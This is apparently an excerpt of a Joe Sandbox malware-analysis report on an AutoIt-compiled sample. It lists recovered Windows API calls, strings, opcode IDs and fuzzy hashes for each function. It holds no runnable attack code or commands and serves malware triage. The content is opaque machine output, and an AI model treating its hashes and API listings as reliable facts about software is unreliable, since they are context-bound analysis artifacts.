                                                                                                                        • Opcode Fuzzy Hash: 3d3f22951c090730139070427c82dc11301d6e95673d74a56b66f5ebf8c29262
                                                                                                                        • Instruction Fuzzy Hash: 8F61E271600619BBFB26DF68CC85FBE7BA8FB08710F104149F955D61C1DBB9A980DB60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                                                                                                                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00FEA636
                                                                                                                        • GetDriveTypeW.KERNEL32 ref: 00FEA683
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FEA6CB
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FEA702
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FEA730
                                                                                                                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                        • API String ID: 2698844021-4113822522
                                                                                                                        • Opcode ID: 7b6a891e33450c5fe384219c2bc132935cbbd79582a2302c8fecca9a8b3d4dcd
                                                                                                                        • Instruction ID: b816420652199d1320c7ab09b2ca93695e8b58bd57d4a5dc17483897ce966c18
                                                                                                                        • Opcode Fuzzy Hash: 7b6a891e33450c5fe384219c2bc132935cbbd79582a2302c8fecca9a8b3d4dcd
                                                                                                                        • Instruction Fuzzy Hash: 535149711083059FC700EF21CC819AAB7E8FF98718F14495CF89697261DB39EE0AEB52
                                                                                                                        APIs
                                                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FEA47A
                                                                                                                        • __swprintf.LIBCMT ref: 00FEA49C
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FEA4D9
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FEA4FE
                                                                                                                        • _memset.LIBCMT ref: 00FEA51D
                                                                                                                        • _wcsncpy.LIBCMT ref: 00FEA559
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FEA58E
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00FEA599
                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00FEA5A2
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00FEA5AC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                        • API String ID: 2733774712-3457252023
                                                                                                                        • Opcode ID: bf808bdf4fc1faeffa43c474464e12412f8cacea5a748d2617de3caf89f3fa11
                                                                                                                        • Instruction ID: 25d5d69f5af26a18a92f470cb6953255995d35c147530d07729a79d42cd63155
                                                                                                                        • Opcode Fuzzy Hash: bf808bdf4fc1faeffa43c474464e12412f8cacea5a748d2617de3caf89f3fa11
                                                                                                                        • Instruction Fuzzy Hash: 2D31D2B290024AABDB31DFA1DC48FEB37BCEF89710F1040A6F908D2054E774A6449B24
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0100C4EC
                                                                                                                        • GetFocus.USER32 ref: 0100C4FC
                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0100C507
                                                                                                                        • _memset.LIBCMT ref: 0100C632
                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0100C65D
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 0100C67D
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 0100C690
                                                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0100C6C4
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0100C70C
                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0100C744
                                                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0100C779
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1296962147-4108050209
                                                                                                                        • Opcode ID: 7d65ef9786f67db165b7c000ac15e211dc7fd568666266b1f965c9163eb35fb1
                                                                                                                        • Instruction ID: aa79177febb0229d88c94f5cb6428b741df85d768060afc0decc52dc5f4ec000
                                                                                                                        • Opcode Fuzzy Hash: 7d65ef9786f67db165b7c000ac15e211dc7fd568666266b1f965c9163eb35fb1
                                                                                                                        • Instruction Fuzzy Hash: 2381A2741083019FF722DF18CA84AABBBE4FB88314F00069DF9D993291D772E945CB92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FD874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FD8766
                                                                                                                          • Part of subcall function 00FD874A: GetLastError.KERNEL32(?,00FD822A,?,?,?), ref: 00FD8770
                                                                                                                          • Part of subcall function 00FD874A: GetProcessHeap.KERNEL32(00000008,?,?,00FD822A,?,?,?), ref: 00FD877F
                                                                                                                          • Part of subcall function 00FD874A: HeapAlloc.KERNEL32(00000000,?,00FD822A,?,?,?), ref: 00FD8786
                                                                                                                          • Part of subcall function 00FD874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FD879D
                                                                                                                          • Part of subcall function 00FD87E7: GetProcessHeap.KERNEL32(00000008,00FD8240,00000000,00000000,?,00FD8240,?), ref: 00FD87F3
                                                                                                                          • Part of subcall function 00FD87E7: HeapAlloc.KERNEL32(00000000,?,00FD8240,?), ref: 00FD87FA
                                                                                                                          • Part of subcall function 00FD87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FD8240,?), ref: 00FD880B
                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FD8458
                                                                                                                        • _memset.LIBCMT ref: 00FD846D
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FD848C
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00FD849D
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00FD84DA
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FD84F6
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00FD8513
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FD8522
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00FD8529
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FD854A
                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00FD8551
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FD8582
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FD85A8
                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FD85BC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3996160137-0
                                                                                                                        • Opcode ID: ecbac443115d7918cafc5f51ffd6e33c21e495623bc677de6157fcd90d6f6502
                                                                                                                        • Instruction ID: ccdf8b4dd03d4b4249885c34b66b0daf2cfcb41093993f6c2f9bbdaa8b940d5d
                                                                                                                        • Opcode Fuzzy Hash: ecbac443115d7918cafc5f51ffd6e33c21e495623bc677de6157fcd90d6f6502
                                                                                                                        • Instruction Fuzzy Hash: 79615F7190020AAFDF11DF95DC45AEEBB7AFF05360F08815AF915A7280DB359A05EF60
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00FF76A2
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00FF76AE
                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00FF76BA
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00FF76C7
                                                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00FF771B
                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00FF7757
                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00FF777B
                                                                                                                        • SelectObject.GDI32(00000006,?), ref: 00FF7783
                                                                                                                        • DeleteObject.GDI32(?), ref: 00FF778C
                                                                                                                        • DeleteDC.GDI32(00000006), ref: 00FF7793
                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00FF779E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                        • String ID: (
                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                        • Opcode ID: cd083deedbe698b656d32956935cffcb2b98f88bd4054c0654a42fda8b46ba4f
                                                                                                                        • Instruction ID: e9a8d5feadea0053a8dd008c49333e0f41301c600f843919c7a803e7eaba2dea
                                                                                                                        • Opcode Fuzzy Hash: cd083deedbe698b656d32956935cffcb2b98f88bd4054c0654a42fda8b46ba4f
                                                                                                                        • Instruction Fuzzy Hash: B2515A76904309EFCB25DFA8CC84EAEBBB9EF48310F14851DFA9997210D735A840DB60
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,0100FB78), ref: 00FEA0FC
                                                                                                                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                                                                                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 00FEA11E
                                                                                                                        • __swprintf.LIBCMT ref: 00FEA177
                                                                                                                        • __swprintf.LIBCMT ref: 00FEA190
                                                                                                                        • _wprintf.LIBCMT ref: 00FEA246
                                                                                                                        • _wprintf.LIBCMT ref: 00FEA264
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                        • API String ID: 311963372-2391861430
                                                                                                                        • Opcode ID: 1efed6af612c382c187ea2765d1e5a051ed727c88fa17814797da6cdcb160a41
                                                                                                                        • Instruction ID: bd136bfcc1849a352ca19494d5812c0d33ca5610da3f78a6357b48091803c041
                                                                                                                        • Opcode Fuzzy Hash: 1efed6af612c382c187ea2765d1e5a051ed727c88fa17814797da6cdcb160a41
                                                                                                                        • Instruction Fuzzy Hash: A0516F72900209ABCF15FBE1CD86EEEB779AF05700F240165F50572091EB3AAF58EB61
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FA0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F86C6C,?,00008000), ref: 00FA0BB7
                                                                                                                          • Part of subcall function 00F848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F848A1,?,?,00F837C0,?), ref: 00F848CE
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F86D0D
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F86E5A
                                                                                                                          • Part of subcall function 00F859CD: _wcscpy.LIBCMT ref: 00F85A05
                                                                                                                          • Part of subcall function 00FA387D: _iswctype.LIBCMT ref: 00FA3885
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                        • API String ID: 537147316-1018226102
                                                                                                                        • Opcode ID: b8ca77b157113af82c6b164ef828db85f1443f929871ae166c5ad4b95f4ffeab
                                                                                                                        • Instruction ID: cff05e96114a3f5fa2f78e315aeac9293e83e9706506f734746ca8e8b691ff6e
                                                                                                                        • Opcode Fuzzy Hash: b8ca77b157113af82c6b164ef828db85f1443f929871ae166c5ad4b95f4ffeab
                                                                                                                        • Instruction Fuzzy Hash: 7302BA315083419FC724EF25C881AEFBBE5BF89714F14491DF486972A1DB38D949EB42
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00F845F9
                                                                                                                        • GetMenuItemCount.USER32(01046890), ref: 00FBD7CD
                                                                                                                        • GetMenuItemCount.USER32(01046890), ref: 00FBD87D
                                                                                                                        • GetCursorPos.USER32(?), ref: 00FBD8C1
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00FBD8CA
                                                                                                                        • TrackPopupMenuEx.USER32(01046890,00000000,?,00000000,00000000,00000000), ref: 00FBD8DD
                                                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FBD8E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2751501086-0
                                                                                                                        • Opcode ID: 098067b83453895ce6c4184b2712f44efc45c3b29a84801c75eb11c7c24455b0
                                                                                                                        • Instruction ID: 8a19ad936b1b9f6d41c8a76de25054064e628b587cd0a77cd537818c48dc3799
                                                                                                                        • Opcode Fuzzy Hash: 098067b83453895ce6c4184b2712f44efc45c3b29a84801c75eb11c7c24455b0
                                                                                                                        • Instruction Fuzzy Hash: 8971D371A01216BBEB319F16DC45FEAFF69FB05364F200216F514661D0EBB66810EB91
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,01000038,?,?), ref: 010010BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                        • API String ID: 3964851224-909552448
                                                                                                                        • Opcode ID: eb9f14a9e46b75084724fcf4c2d6e74c6c1831f3f42fe775a6c4275de3a53d36
                                                                                                                        • Instruction ID: 5ff301f7ea379d9e628becafab7f59fcbc9ad36d4a1fe27f855cf03645fd26ae
                                                                                                                        • Opcode Fuzzy Hash: eb9f14a9e46b75084724fcf4c2d6e74c6c1831f3f42fe775a6c4275de3a53d36
                                                                                                                        • Instruction Fuzzy Hash: 65417CB110024A8BEF16EF94ED81AEE3764BF5A304F504444FCD15B292DF34E92ADBA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                                                                                                                          • Part of subcall function 00F87A84: _memmove.LIBCMT ref: 00F87B0D
                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FE55D2
                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FE55E8
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FE55F9
                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FE560B
                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FE561C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: SendString$_memmove
                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                        • API String ID: 2279737902-1007645807
                                                                                                                        • Opcode ID: 3533acb3b485076737537ec6a68f1e4629556db3be289b811b5f78f348f1847c
                                                                                                                        • Instruction ID: 8980fb669a2f7a06e47820734d8af753550230dc060fa88d96d66f7d808f4483
                                                                                                                        • Opcode Fuzzy Hash: 3533acb3b485076737537ec6a68f1e4629556db3be289b811b5f78f348f1847c
                                                                                                                        • Instruction Fuzzy Hash: 8611B221A50269B9DB20B663CC8AEFFBB7CEFD1F04F50041AB485E7091DEA45D05DAA0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                        • String ID: 0.0.0.0
                                                                                                                        • API String ID: 208665112-3771769585
                                                                                                                        • Opcode ID: fe8a5bf9a3c39ce32540af5d6dde44629f77423b8051e859f86004cbc58d9fe9
                                                                                                                        • Instruction ID: 5d75993e48a9965f0a7940026724a72aa9cc16733f29441405313a923676ea17
                                                                                                                        • Opcode Fuzzy Hash: fe8a5bf9a3c39ce32540af5d6dde44629f77423b8051e859f86004cbc58d9fe9
                                                                                                                        • Instruction Fuzzy Hash: 5B110571A04119AFCB31EB259C06EDF77BCAB41720F0401A9F448A6042EFB9AA81B761
                                                                                                                        APIs
                                                                                                                        • timeGetTime.WINMM ref: 00FE521C
                                                                                                                          • Part of subcall function 00FA0719: timeGetTime.WINMM(?,75A8B400,00F90FF9), ref: 00FA071D
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00FE5248
                                                                                                                        • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00FE526C
                                                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00FE528E
                                                                                                                        • SetActiveWindow.USER32 ref: 00FE52AD
                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FE52BB
                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00FE52DA
                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 00FE52E5
                                                                                                                        • IsWindow.USER32 ref: 00FE52F1
                                                                                                                        • EndDialog.USER32(00000000), ref: 00FE5302
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                        • String ID: BUTTON
                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                        • Opcode ID: b4c682b658192ac3b3ae952c235c4f657e7bb25df2f3e4227990fb510fdd7bf0
                                                                                                                        • Instruction ID: 99e787a1bbccec195713a7360d71d1d549fbc688877c928d7a19ff1d124d6681
                                                                                                                        • Opcode Fuzzy Hash: b4c682b658192ac3b3ae952c235c4f657e7bb25df2f3e4227990fb510fdd7bf0
